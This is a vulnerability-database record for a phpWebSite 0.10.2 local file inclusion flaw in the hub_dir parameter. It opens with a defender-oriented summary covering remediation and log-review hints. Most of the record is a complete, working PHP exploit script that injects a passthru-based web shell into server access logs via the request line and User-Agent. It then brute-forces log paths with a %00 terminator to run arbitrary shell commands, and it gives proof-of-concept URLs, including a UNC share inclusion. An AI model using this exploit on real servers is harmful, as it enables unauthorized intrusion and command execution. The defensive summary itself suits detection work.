Description
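No description provided by source. Summary drawn from the record below: in phpWebSite 0.10.2 and earlier, `index.php` passes `hub_dir` to `loadConfig()`, which runs `include($hub_dir . 'conf/config.php')`. The only check is that the value does not contain `://`, so a request-supplied `hub_dir` can point the include at an arbitrary file on the server (local file inclusion). The proof of concept reaches command execution by getting PHP code written into a web-server log and then including that log. Its author states it works with `magic_quotes_gpc = Off`, uses a `%00` terminator to drop the `conf/config.php` suffix, and adds that on PHP 5 a UNC share path also passes the `://` check. For defenders: `hub_dir` must not be settable from the request (the quoted code appears to rely on `register_globals`-style variable import; confirm against the install), and the `://` filter should be replaced by resolving the value against a fixed allow-list of directories. Log review should look for requests to `index.php` whose `hub_dir` parameter holds a filesystem path or `%00`, and for `<?php` in the request line or User-Agent field of access logs. The record lists no CVE and names no fixed version; its CVSS score of 0.0 with vector `NONE` indicates the entry was not scored, not that the issue is low severity.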
{"href": "https://www.seebug.org/vuldb/ssvid-63474", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63474", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/php -q -d short_open_tag=on\n<?\necho "PHPWebSite <= 0.10.2 remote cmmnds xctn\\r\\n";\necho "-> arbitrary local inclusion, works with magic_quotes_gpc = Off\\r\\n";\necho "by rgod, mail: rgod@autistici.org\\r\\n";\necho "site: http://retrogod.altervista.org\\r\\n\\r\\n";\n\nif ($argc<4) {\necho "Usage: php ".$argv[0]." host path cmd OPTIONS\\r\\n";\necho "host: target server (ip/hostname)\\r\\n";\necho "path: path to phpwebsite\\r\\n";\necho "cmd: a shell command\\r\\n";\necho "Options:\\r\\n";\necho " -p[port]: specify a port other than 80\\r\\n";\necho " -P[ip:port]: specify a proxy\\r\\n";\necho "Examples:\\r\\n";\necho "php ".$argv[0]." localhost /phpwebsite/ ls -la\\r\\n";\ndie;\n}\n\n/* explaination:\n vulnerable code in index.php at lines 21-29:\n\n...\n if (!isset($hub_dir)) {\n $hub_dir = NULL;\n}\nif (!preg_match ("/:\\/\\//i", $hub_dir)) {\n loadConfig($hub_dir);\n} else {\n exit('FATAL ERROR! Hub directory was malformed.');\n}\n...\n\nand at lines 125-143:\n\n...\nfunction loadConfig($hub_dir){\n\n if (file_exists($hub_dir . 'conf/config.php')) {\n \tif (filesize($hub_dir . 'conf/config.php') > 0) {\n\t include($hub_dir . 
'conf/config.php');\n\n\t define('PHPWS_SOURCE_DIR', $source_dir);\n\n\n\t} else {\n\n\t header('Location: ./setup/set_config.php');\n\t exit();\n\t}\n } else {\n\theader('Location: ./setup/set_config.php');\n\texit();\n }\n}\n....\n\nso, you can include files from local resources, poc:\n\nhttp://[target]/[path]/index.php?hub_dir=/var/log/httpd/access_log%00\n\nyou don't see output, but we have some code in log files, it will be executed\n\nalso, on php5, arbitrary remote inclusion:\n\nhttp://[target]/[path]/index.php?hub_dir=\\\\192.168.1.3\\c\\\n\nincluding a full accessible share\nwhere on samba resource you have some code in conf/config.php\n\t\t\t\t\t\t\t\t\t */\nerror_reporting(0);\nini_set("max_execution_time",0);\nini_set("default_socket_timeout",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=" .";}\n else\n {$result.=" ".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=" ".dechex(ord($string[$i]));}\n else\n {$exa.=" 0".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.="\\r\\n"; $exa.="\\r\\n";}\n }\n return $exa."\\r\\n".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n $c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\\r\\n";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n }\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n #debug\n #echo "\\r\\n".$html;\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$cmd="";$port=80;$proxy="";\n\nfor ($i=3; $i<=$argc-1; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>"-p") and ($temp<>"-P"))\n{$cmd.=" ".$argv[$i];}\nif ($temp=="-p")\n{\n $port=str_replace("-p","",$argv[$i]);\n}\nif ($temp=="-P")\n{\n $proxy=str_replace("-P","",$argv[$i]);\n}\n}\n$cmd=urlencode($cmd);\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\necho "[1] Injecting some code in log files...\\r\\n";\n$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';\n$CODE.='passthru($_GET[cmd]);echo 666;die;?>';\n$packet.="GET ".$path.$CODE." 
HTTP/1.1\\r\\n";\n$packet.="User-Agent: ".$CODE."\\r\\n";\n$packet.="Host: ".$serv."\\r\\n";\n$packet.="Connection: close\\r\\n\\r\\n";\n#debug\n#echo quick_dump($packet);\nsendpacketii($packet);\nsleep(2);\n\n# fill with possible locations\n$paths= array (\n "/var/log/httpd/access_log",\n "/var/log/httpd/error_log",\n "../apache/logs/error.log",\n "../apache/logs/access.log",\n "../../apache/logs/error.log",\n "../../apache/logs/access.log",\n "../../../apache/logs/error.log",\n "../../../apache/logs/access.log",\n "../../../../apache/logs/error.log",\n "../../../../apache/logs/access.log",\n "/etc/httpd/logs/acces_log",\n "/etc/httpd/logs/acces.log",\n "/etc/httpd/logs/error_log",\n "/etc/httpd/logs/error.log",\n "/var/www/logs/access_log",\n "/var/www/logs/access.log",\n "/usr/local/apache/logs/access_log",\n "/usr/local/apache/logs/access.log",\n "/var/log/apache/access_log",\n "/var/log/apache/access.log",\n "/var/log/access_log",\n "/var/www/logs/error_log",\n "/www/logs/error.log",\n "/usr/local/apache/logs/error_log",\n "/usr/local/apache/logs/error.log",\n "/var/log/apache/error_log",\n "/var/log/apache/error.log",\n "/var/log/access_log",\n "/var/log/error_log",\n);\n\nfor ($i=0; $i<=count($paths)-1; $i++)\n{\n $j=$i+2;\n echo "[".$j."] Trying with ".$paths[$i]."%00\\r\\n";\n $xpl=$paths[$i];\n $packet ="GET ".$p."index.php?cmd=".$cmd."&hub_dir=".$xpl."%00 HTTP/1.0\\r\\n";\n $packet.="Host: ".$host."\\r\\n";\n $packet.="Connection: Close\\r\\n\\r\\n";\n #debug, shows packets in a nice format\n #echo quick_dump($packet);\n sendpacketii($packet);\n if (strstr($html,"666")){\n echo "Exploit succeeded...\\r\\n";\n $temp=explode("666",$html);\n echo $temp[1];\n die;\n }\n}\n#if you are here...\necho "Exploit failed...";\n?>\n\n# milw0rm.com [2006-04-14]\n\n ", "id": "SSV:63474", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:14:00", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, 
"backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645484115, "score": 1659785532, "epss": 1678850553}}
{}